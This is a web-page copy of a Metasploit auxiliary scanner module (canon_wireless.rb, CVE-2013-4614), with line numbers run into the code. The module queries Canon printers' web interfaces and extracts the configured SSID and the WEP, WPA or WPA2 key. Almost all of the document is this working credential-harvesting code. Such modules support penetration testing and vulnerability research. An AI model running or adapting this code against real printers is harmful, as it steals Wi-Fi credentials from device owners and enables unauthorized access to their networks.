Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'nokogiri'67class MetasploitModule < Msf::Auxiliary8include Msf::Auxiliary::Report9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::Scanner1112def initialize(info={})13super(update_info(info,14'Name' => 'Canon Printer Wireless Configuration Disclosure',15'Description' => %q{16This module enumerates wireless credentials from Canon printers with a web interface.17It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,18MX890, MX920.19},20'License' => MSF_LICENSE,21'Author' =>22[23'Matt "hostess" Andreko <mandreko[at]accuvant.com>'24],25'References' => [26[ 'CVE', '2013-4614' ],27[ 'OSVDB', '94417' ],28[ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']29],30'DisclosureDate' => '2013-06-18'))31end3233def get_network_settings34begin35res = send_request_cgi({36'method' => 'GET',37'uri' => '/English/pages_MacUS/lan_set_content.html',38})39rescue40print_error("#{rhost}:#{rport} Could not connect.")41return42end4344if res45if res.code == 2004647html = Nokogiri::HTML(res.body)4849checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'5051if checked_lan_setting.count == 152lan_setting = ''53ssid = ''54case checked_lan_setting[0]['value']55when '0'56lan_setting = 'Do not use LAN'57when '1'58lan_setting = 'Use wired LAN'59when '2'60lan_setting = 'Use wireless LAN'6162ssid_input = html.xpath '//input[@name="LAN_TXT1"]'63ssid = ssid_input[0]['value'] if ssid_input.count == 164end6566return lan_setting, ssid67else68print_error("#{rhost}:#{rport} Could not determine LAN Settings.")69end7071elsif res.code == 40172print_error("#{rhost}:#{rport} Authentication failed")73elsif res.code == 40474print_error("#{rhost}:#{rport} File not found")75end76end77end7879def get_wireless_key80begin81res = send_request_cgi({82'method' => 'GET',83'uri' => "/English/pages_MacUS/wls_set_content.html",84})85rescue86print_error("#{ip}:#{rport} Could not connect.")87return88end8990if res91if res.code == 20092html = Nokogiri::HTML(res.body)93encryption_setting = ''94encryption_key = ''9596checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'97case checked_encryption_setting[0]['value']98when '0'99encryption_setting = 'None'100when '1'101encryption_setting = 'WEP'102wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'103encryption_key = wep_key_inputs.collect{|x| x['value']}.join(', ')104when '2'105encryption_setting = 'WPA'106wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'107encryption_key = wpa_key_input[0]['value']108when '3'109encryption_setting = 'WPA2'110wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'111encryption_key = wpa2_key_input[0]['value']112end113114return encryption_setting, encryption_key115116elsif res.code == 401117print_error("#{rhost}:#{rport} Authentication failed")118elsif res.code == 404119print_error("#{rhost}:#{rport} File not found")120end121end122end123124def run_host(ip)125126ns = get_network_settings127return if ns.nil?128129good_string = "#{rhost}:#{rport} Option: #{ns[0]}"130if ns[0] == 'Use wireless LAN'131wireless_key = get_wireless_key132good_string += "\tSSID: #{ns[1]}\tEncryption Type: #{wireless_key[0]}\tKey: #{wireless_key[1]}"133end134135report_note({136:data => good_string,137:type => 'canon.wireless',138:host => ip,139:port => rport140})141142print_good good_string143144end145end146147148